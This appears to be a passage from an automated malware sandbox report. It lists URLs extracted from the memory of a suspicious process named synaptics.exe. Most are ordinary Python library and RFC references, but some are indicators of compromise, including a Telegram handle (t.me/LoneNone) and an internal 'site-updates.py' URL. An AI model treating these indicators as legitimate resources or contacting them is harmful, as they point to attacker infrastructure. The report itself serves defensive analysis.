            Source: synaptics.exe, 00000023.00000003.2030551439.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.000000000218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3129
            Source: synaptics.exe, 00000023.00000002.2504866090.00000000043C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
            Source: synaptics.exe, 00000023.00000003.1927018738.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1926846326.0000000002034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/4325783
            Source: synaptics.exe, 00000023.00000003.2100621573.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2121139838.00000000020EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2128006354.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2113697144.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.00000000020EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2091470869.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000020F1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2110641984.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2094571264.00000000020F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
            Source: synaptics.exe, 00000023.00000002.2542381803.000000006BC7B000.00000002.00000001.01000000.00000035.sdmp, synaptics.exe, 00000023.00000002.2543096828.000000006BC9A000.00000002.00000001.01000000.00000034.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
            Source: synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/blob/master/include/openssl/pem.h
            Source: synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/issues/14579
            Source: synaptics.exe, 00000023.00000003.2133539100.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2138152554.00000000021DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/1846
            Source: synaptics.exe, 00000023.00000003.2141547551.00000000021DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/3578.
            Source: synaptics.exe, 00000023.00000003.2141547551.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2143667730.0000000001F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/2238
            Source: synaptics.exe, 00000023.00000002.2521145479.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2143667730.0000000001F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
            Source: synaptics.exe, 00000023.00000003.2047361472.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2044965901.0000000001F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/pyopenssl/pull/933
            Source: synaptics.exe, 00000023.00000003.1910336488.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1896689507.0000000000D41000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1910336488.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1908572278.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1896689507.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1913611599.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2470279767.0000000001950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
            Source: synaptics.exe, 00000023.00000003.2030364344.0000000002094000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-hyper/rfc3986
            Source: synaptics.exe, 00000023.00000003.2041218643.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/113199
            Source: synaptics.exe, 00000023.00000003.1954332606.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1950993740.0000000002034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/7160#discussion_r195405230
            Source: synaptics.exe, 00000023.00000003.1992460407.0000000002478000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988313998.0000000002478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168z(Andrey
            Source: synaptics.exe, 00000023.00000003.2030551439.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2504866090.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.000000000218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
            Source: synaptics.exe, 00000023.00000003.2054763098.0000000002140000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081651279.0000000002140000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.0000000002140000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2041218643.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
            Source: synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2791
            Source: synaptics.exe, 00000023.00000002.2505886757.0000000004400000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
            Source: synaptics.exe, 00000023.00000003.1992460407.0000000002478000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988313998.0000000002478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020)
            Source: synaptics.exe, 00000023.00000003.2047361472.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2044965901.0000000001F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3267.
            Source: synaptics.exe, 00000023.00000003.2048518302.0000000000D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
            Source: synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/651
            Source: synaptics.exe, 00000023.00000003.2019402139.00000000023DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/800
            Source: synaptics.exe, 00000023.00000003.2041218643.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/2624
            Source: synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/3024
            Source: synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2086898648.0000000002111000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2149525238.0000000002747000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081651279.000000000213C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
            Source: synaptics.exe, 00000023.00000003.2084198547.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2092863211.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2150769416.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2121139838.00000000020EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2121634293.0000000002749000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2113697144.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2157009339.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.00000000020EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2091470869.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000020F1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2110641984.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081093217.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2098540705.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2173422749.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2205829752.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2192423602.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2149525238.0000000002747000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081651279.000000000213C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
            Source: synaptics.exe, 00000023.00000003.2116149701.00000000026C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
            Source: synaptics.exe, 00000023.00000003.2111185909.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2096324482.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2082165377.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2069838592.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2044366675.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2036481442.0000000002757000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2038945930.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2195430436.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2222647186.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2048518302.0000000000D74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
            Source: synaptics.exe, 00000023.00000003.2086898648.0000000002111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
            Source: synaptics.exe, 00000023.00000002.2486956011.0000000002360000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2445499563.0000000001F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
            Source: synaptics.exe, 00000023.00000003.2016114364.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2030364344.0000000002094000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2001368000.0000000002086000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002088000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2028143651.00000000020A1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1995635317.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1992460407.000000000247B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988824062.0000000002174000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1995635317.0000000002086000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988313998.0000000002478000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1990298469.0000000002081000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2006887362.0000000002089000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2003895222.000000000247A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1990298469.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1994680702.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1995635317.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2003471328.000000000209A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988127501.0000000002099000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
            Source: synaptics.exe, 00000023.00000003.2061637959.0000000002161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
            Source: synaptics.exe, 00000023.00000003.2039743862.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1956138325.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2137443994.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2100621573.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1940113752.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2069043267.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1896689507.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2128006354.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1959266113.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1931385673.0000000002030000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1926911408.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1907119440.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1937976815.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935930288.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1915176286.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946403574.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2144294615.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
            Source: synaptics.exe, 00000023.00000002.2500336302.0000000004030000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2050033072.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2501384899.0000000004080000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2050224991.0000000002051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
            Source: synaptics.exe, 00000023.00000003.1947553736.000000000201D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap04.html#tag_04_13)
            Source: synaptics.exe, 00000023.00000003.2189669372.00000000045EC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2210616676.000000000275A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2203659542.000000000269A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2195297031.00000000045EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pyasn1.readthedocs.io/en/latest/license.html
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1DDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
            Source: synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1980946741.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
            Source: synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1980946741.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
            Source: synaptics.exe, 00000023.00000002.2523286753.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2006887362.0000000002089000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2003895222.000000000247A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1990298469.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1994680702.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1995635317.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2003471328.000000000209A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988127501.0000000002099000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
            Source: synaptics.exe, 00000023.00000003.2144294615.0000000002046000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2137443994.0000000002046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioz
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2508011307.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2326402328.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2442445774.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2535963450.00000000050C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/LoneNone
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/LoneNoneH
            Source: synaptics.exe, 00000023.00000003.2142278123.0000000002137000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081651279.000000000213A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.0000000002139000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2086898648.0000000002137000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2039743862.0000000002046000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2037301715.0000000002137000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2054763098.0000000002137000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2036481442.0000000002757000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2132957902.000000000213A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2120466095.0000000002137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
            Source: synaptics.exe, 00000023.00000003.2245770456.00000000021D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2244405952.0000000002754000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2240278565.0000000004971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
            Source: synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#appendix-A
            Source: synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.3
            Source: synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
            Source: synaptics.exe, 00000023.00000003.2016874067.0000000002131000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2019530310.0000000002099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.4
            Source: synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2530642395.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017
            Source: synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2322096151.0000000000D69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-67
            Source: synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2443636300.00000000021D6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2319593829.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325645647.00000000023A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.1
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.2
            Source: synaptics.exe, 00000023.00000003.2101481574.0000000002104000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2456483780.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081093217.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2086898648.0000000002111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: synaptics.exe, 00000023.00000003.2091470869.0000000002117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.H
            Source: synaptics.exe, 00000023.00000003.2086898648.000000000211A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/e
            Source: synaptics.exe, 00000023.00000003.2075242644.0000000002106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest
            Source: synaptics.exe, 00000023.00000003.2047361472.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2044965901.0000000001F8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2047361472.0000000001F93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html
            Source: synaptics.exe, 00000023.00000002.2505886757.0000000004400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
            Source: synaptics.exe, 00000023.00000002.2505886757.0000000004400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxys
            Source: synaptics.exe, 00000023.00000003.2146348280.0000000002089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxies)
            Source: synaptics.exe, 00000023.00000002.2504866090.00000000043C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
